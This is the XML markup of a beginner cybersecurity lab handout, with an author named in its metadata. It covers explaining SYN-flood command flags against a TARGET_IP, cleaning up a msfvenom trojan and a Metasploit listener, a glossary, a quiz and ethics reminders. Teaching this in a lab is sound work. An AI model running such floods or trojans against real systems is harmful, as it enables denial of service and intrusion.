    <w:p w14:paraId="7D18CA3F" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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send SYN packets</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B13E094" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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--flood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send as fast as possible</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="049B53D4" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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 80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target port 80 (web)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55EB991F" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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TARGET_IP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victim's IP</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A5E2170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do NOT run this on real targets!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illegal and can get you in serious trouble.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1835A41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Real-World Example</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CE527D3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2016, hackers used millions of hacked cameras and DVRs to attack a company called Dyn. This took down Twitter, Netflix, and Reddit for hours!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E35B433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4318F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D4EED9B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9: CLEAN UP (2 minutes)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67FE2E6B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Stop the Listener</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D47BA48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Metasploit, type:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63C215D9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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27CD20CB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type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confirm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="036FC200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Delete the Trojan File</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71721A97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~/malware_lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41731395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trojan.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C3175D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means:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35643BA1" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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remove (delete) file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6150583E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Verify It's Gone</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62562AAC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14:paraId="1EAFF4C2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show nothing (empty folder).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F4D7C02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complete! Your environment is clean.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A9B4825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211A5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22B9119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SUMMARY: WHAT WE LEARNED TODAY</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C6A6E3C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701"/>
      </w:tblGrid>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="290BF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3BAE7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1F61839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5020BA" w:rsidRPr="005020BA" w14:paraId="10A1B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4518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07097387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Software designed to harm or exploit computers</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="49F3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E68D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49367A00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Malware disguised as legitimate software</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="4CB6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D66B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0977029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malicious code delivered by malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="5A1E6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10A0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Reverse Shell</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="73889739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 from victim back to attacker</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="286B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5365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Listener/Handler</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="5FD924F4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Attacker's tool that receives connections</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="30D6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B694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40EF211C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fingerprint of a file</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="56E0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B123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DoS Attack</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="6D184376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Flooding a target to make it unavailable</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="0CC1EB31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Tools We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08"/>
      </w:tblGrid>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="3195A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87AFD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142FA9F" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="0050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5020BA" w:rsidRPr="005020BA" w14:paraId="4E68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A434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msfvenom</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="38D13EF3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payloads/malware</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="53FCA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7BA0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msfconsole</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="7E747014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Metasploit Framework for testing</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="005020BA" w:rsidRPr="005020BA" w14:paraId="16BD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7F83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md5sum</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
            <w:vAlign w:val="center"/>
            <w:hideMark/>
          </w:tcPr>
          <w:p w14:paraId="1B408F12" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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 file fingerprints</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7C375BA7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Commands We Learned:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="72C40A2E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                  # Show IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65C771EE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folder_name     # Create folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6AB4F8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folder_name        # Enter folder</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BAD4B16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-lh                # List files with details</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32265F4A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filename           # Delete file</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05225AA0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md5sum filename       # Get file hash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11FB5D35" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="0050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msfconsole           # Start Metasploit</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73336CC1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FB487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6E0124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QUICK ASSIGNMENT (Submit by end of class)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D2A6332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 These 5 Questions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E2C457D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your answers on paper or in a text file.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13729B76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1: (2 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EC2C98C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your Kali Linux IP address?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01BAC4DF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IP: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="751F5DA6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2: (2 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F58A3D0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MD5 hash of the trojan.exe file you created?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="169152BC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Hash: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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="601FA68D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3: (3 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3945482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does the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LHOST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 mean in msfvenom?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31EE3E0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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BCEC3C0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4: (3 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6638667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TWO things an attacker could do with a Meterpreter session:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1CC04C56" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="0050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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="183D35F1" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4B28F3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5: (5 points)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="016F00A5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is it important to ONLY do these activities in a virtual machine and NEVER on real systems?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A7871EA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________________________________________________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________________________________________________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________________________________________________</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19B6EBCA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917585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98051D4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NEED HELP?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ACFFF01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Common Problems and Solutions:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4876A869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Problem: "Command not found"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B279AB1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for typos. Linux is case-sensitive!</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="096623E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Problem: Can't find IP address</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E7C708C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 for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inet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followed by numbers like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192.168.x.x</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F66899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Problem: msfvenom is slow</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6617A932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patient! First run can take 30-60 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C2C77E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Problem: Metasploit won't start</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F6C0EEE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Wait longer - it can take 1-2 minutes on slower computers.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F85985A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Problem: "Address already in use"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23329102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port is busy. Try </w:t>
      </w:r>
      <w:r w:rsidRPr="005020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LPORT 5555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instead.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65F1CB2C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A5D9E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A4F1432" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="0050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Points to Emphasize:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76C6A571" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="0050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use these tools outside the lab</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DC5D3BE" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="0050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hackers go to jail</w:t>
      </w:r>
      <w:r w:rsidRPr="00502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doing this without permission</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6958E4E1" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="0050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learn attacks to build better defenses</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1251892C" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="00502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Ethical hackers help protect people</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D081302" w14:textId="77777777" w:rsidR="005020BA" w:rsidRPr="005020BA" w:rsidRDefault="000B3296" w:rsidP="005020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B329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8A53EE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9CE0C25" w14:textId="77777777" w:rsidR="005020BA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OF LAB</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D81047" w14:textId="1A7CC6FD" w:rsidR="00676A80" w:rsidRPr="005020BA" w:rsidRDefault="005020BA" w:rsidP="0050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Remember: With great power comes great responsibility! </w:t>
      </w:r>
      <w:r w:rsidRPr="005020B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🦸</w:t>
      </w:r>
      <w:r w:rsidRPr="00502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‍♂️</w:t>
      </w:r>
    </w:p>
    <w:sectPr w:rsidR="00676A80" w:rsidRPr="00502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B12"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A51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07D8F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="49C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C725B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B30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2D4B8E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="BAC2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43E2D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="188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94F86"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="1CA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40CCE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E72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F3B70"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="11C0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16C7B"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="DC9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76A48"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="5650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B79B9"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="12D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963DE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="2A9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C47F6C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="41F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30E85"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6A9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71349F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="E51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C0814"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="378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EA691F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="119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865CA"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="8F82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F66DC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9B4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779EE"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="FE7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DD1AEB"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D486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352A79"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="197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F20CC3"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A24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26317"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="578C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436040"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="794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A029E"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4E0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E127FC"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="4180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D31960"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="6676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211B5F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7B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16A4C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="481C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8D4B5C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="A6A2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70E58"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="F156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446322">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="10301788">
    <w:abstractNumId w:val="18"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="1775437549">
    <w:abstractNumId w:val="20"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="13270726">
    <w:abstractNumId w:val="23"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="1502743356">
    <w:abstractNumId w:val="19"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1816337451">
    <w:abstractNumId w:val="13"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="1278639563">
    <w:abstractNumId w:val="25"/>
  </w:num>
  <w:num w:numId="8" w16cid:durableId="1253586374">
    <w:abstractNumId w:val="21"/>
  </w:num>
  <w:num w:numId="9" w16cid:durableId="1462385013">
    <w:abstractNumId w:val="11"/>
  </w:num>
  <w:num w:numId="10" w16cid:durableId="1743023804">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="11" w16cid:durableId="1933273771">
    <w:abstractNumId w:val="1"/>
  </w:num>
  <w:num w:numId="12" w16cid:durableId="1589457969">
    <w:abstractNumId w:val="29"/>
  </w:num>
  <w:num w:numId="13" w16cid:durableId="979187858">
    <w:abstractNumId w:val="7"/>
  </w:num>
  <w:num w:numId="14" w16cid:durableId="2121072660">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="15" w16cid:durableId="219026477">
    <w:abstractNumId w:val="15"/>
  </w:num>
  <w:num w:numId="16" w16cid:durableId="43868839">
    <w:abstractNumId w:val="17"/>
  </w:num>
  <w:num w:numId="17" w16cid:durableId="816726867">
    <w:abstractNumId w:val="14"/>
  </w:num>
  <w:num w:numId="18" w16cid:durableId="926034966">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="19" w16cid:durableId="1174539027">
    <w:abstractNumId w:val="31"/>
  </w:num>
  <w:num w:numId="20" w16cid:durableId="1203253208">
    <w:abstractNumId w:val="27"/>
  </w:num>
  <w:num w:numId="21" w16cid:durableId="123887359">
    <w:abstractNumId w:val="12"/>
  </w:num>
  <w:num w:numId="22" w16cid:durableId="638386373">
    <w:abstractNumId w:val="10"/>
  </w:num>
  <w:num w:numId="23" w16cid:durableId="1223636887">
    <w:abstractNumId w:val="24"/>
  </w:num>
  <w:num w:numId="24" w16cid:durableId="1589539864">
    <w:abstractNumId w:val="30"/>
  </w:num>
  <w:num w:numId="25" w16cid:durableId="584533907">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="26" w16cid:durableId="1487551003">
    <w:abstractNumId w:val="8"/>
  </w:num>
  <w:num w:numId="27" w16cid:durableId="1191063656">
    <w:abstractNumId w:val="22"/>
  </w:num>
  <w:num w:numId="28" w16cid:durableId="2062244481">
    <w:abstractNumId w:val="16"/>
  </w:num>
  <w:num w:numId="29" w16cid:durableId="2048413441">
    <w:abstractNumId w:val="9"/>
  </w:num>
  <w:num w:numId="30" w16cid:durableId="173691018">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="31" w16cid:durableId="906766194">
    <w:abstractNumId w:val="28"/>
  </w:num>
  <w:num w:numId="32" w16cid:durableId="17659534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BA"/>
    <w:rsid w:val="000B3296"/>
    <w:rsid w:val="001C7624"/>
    <w:rsid w:val="00251E62"/>
    <w:rsid w:val="002F5AD6"/>
    <w:rsid w:val="005020BA"/>
    <w:rsid w:val="00676A80"/>
    <w:rsid w:val="007655D5"/>
    <w:rsid w:val="008904CB"/>
    <w:rsid w:val="009A3E44"/>
    <w:rsid w:val="00F3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4133"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{83CA81C6-755C-F642-9EEF-E7A90BA5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B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0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20BA"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:customStyle="1" w:styleId="whitespace-normal">
    <w:name w:val="whitespace-normal"/>
    <w:basedOn w:val="Normal"/>
    <w:rsid w:val="0050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20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2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20B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5020BA"/>
  </w:style>
  <w:style w:type="paragraph" w:styleId="NormalWeb">
    <w:name w:val="Normal (Web)"/>
    <w:basedOn w:val="Normal"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="0050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Hafiz Adnan</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>Hussain Hafiz Adnan</cp:lastModifiedBy>
  <cp:revision>3</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-11-20T01:01:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-11-20T03:45:00Z</dcterms:modified>
</cp:coreProperties>
</file>